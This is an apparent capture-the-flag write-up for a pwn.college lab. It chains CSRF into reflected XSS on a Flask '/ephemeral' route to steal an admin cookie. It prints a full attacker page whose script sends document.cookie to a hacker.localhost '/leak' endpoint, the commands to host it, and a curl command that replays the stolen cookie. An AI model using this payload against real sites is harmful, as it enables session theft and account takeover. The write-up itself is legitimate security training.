csrf xss cookie (pwn.college)

Summary

We chain CSRF -> reflected XSS -> cookie theft. The victim bot always visits http://hacker.localhost:1337/, so we host an attacker page at / that redirects the victim to /ephemeral?msg=... with a <script> payload. That payload runs on http://challenge.localhost, reads document.cookie (not HttpOnly), and exfiltrates the admin cookie back to our server. We then replay the cookie to view the admin post (the flag).

---

Start

The challenge ships two binaries:

• ./server runs the Flask app at http://challenge.localhost

• ./victim launches the headless admin bot

Run the server:

cd /challenge
./server &

---

Understand the goal from server code

Key facts from server:

1. Admin credentials are derived from the flag:

db.execute("""CREATE TABLE users AS SELECT "admin" AS username, ? as password""", [flag[-20:]])

1. Successful login sets the cookie:

response.set_cookie('auth', username+"|"+password)

1. Admin's flag post is already in the posts table:

db.execute("""CREATE TABLE posts AS SELECT ? AS content, "admin" AS author, FALSE AS published""", [flag])

If we can steal the admin cookie (auth=admin|<last_20_of_flag>), we can request / as admin and see the flag.

---

The reflected XSS sink

/ephemeral reflects a GET parameter directly into HTML:

@app.route("/ephemeral", methods=["GET"])
def challenge_ephemeral():
    return f"""
        <html><body>
        <h1>You have received an ephemeral message!</h1>
        The message: {flask.request.args.get("msg", "(none)")}
        <hr><form>Craft an ephemeral message:<input type=text name=msg action=/ephemeral><input type=submit value=Submit></form>
        </body></html>
    """

That means:

/ephemeral?msg=<script>alert(1)</script>

is a reflected XSS sink. just like the previous challenge

---

Two-layer JavaScript plan

We need two scripts:

1. Outer JS on http://hacker.localhost:1337/ -> constructs the payload and navigates the victim to /ephemeral?msg=....

2. Inner JS inside the reflected XSS -> runs in challenge.localhost, steals document.cookie, and sends it back.

Because </script> inside a <script> tag breaks parsing, we split the closing tag:

const end = "</s" + "cript>";

We also URL-encode the payload to avoid special characters (+, <, >, spaces) breaking the URL.

---

Final attacker page

This page redirects the victim to the XSS URL:

<!doctype html><meta charset="utf-8">
<title>csrf-xss-cookie</title>
<script>
  const end = "</s" + "cript>";
  const inner = "new Image().src='http://hacker.localhost:1337/leak?c='+encodeURIComponent(document.cookie)";
  const payload = "<script>" + inner + end;
  const url = "http://challenge.localhost/ephemeral?msg=" + encodeURIComponent(payload);
  location = url;
</script>

Save it as /tmp/index.html so it is served at http://hacker.localhost:1337/:

cat > /tmp/index.html <<'EOF'
<!doctype html><meta charset="utf-8">
<title>csrf-xss-cookie</title>
<script>
  const end = "</s" + "cript>";
  const inner = "new Image().src='http://hacker.localhost:1337/leak?c='+encodeURIComponent(document.cookie)";
  const payload = "<script>" + inner + end;
  const url = "http://challenge.localhost/ephemeral?msg=" + encodeURIComponent(payload);
  location = url;
</script>
EOF

Host it:

python3 -m http.server 1337 --directory /tmp &

---

Trigger the victim

./victim

Expected server logs:

GET / HTTP/1.1                 (victim loads attacker page)
GET /ephemeral?msg=...          (victim hits reflected XSS)
GET /leak?c=auth%3Dadmin%7C...  (cookie exfil)

The /leak 404 is fine; the request still appears in the log.

---

Extract the cookie and log in

From the http.server log, take the leaked cookie (URL-encoded):

/leak?c=Cookie

Decode the cookie using CyberChef or any URL decoding website

Then reuse it:

curl -s --cookie "auth=admin|PASTE_PASSWORD" http://challenge.localhost | rg -n "YOUR POST|pwn\.college"

You'll see the admin post (the flag).i'

---

Timeline view

t0  victim logs in as admin at challenge.localhost
t1  victim visits http://hacker.localhost:1337/
t2  attacker page builds XSS payload and navigates to /ephemeral?msg=...
t3  /ephemeral reflects msg into HTML (no escaping)
t4  XSS runs on challenge.localhost, reads document.cookie
t5  cookie is exfiltrated to http://hacker.localhost:1337/leak?c=...
t6  attacker replays cookie to / and reads admin post (flag)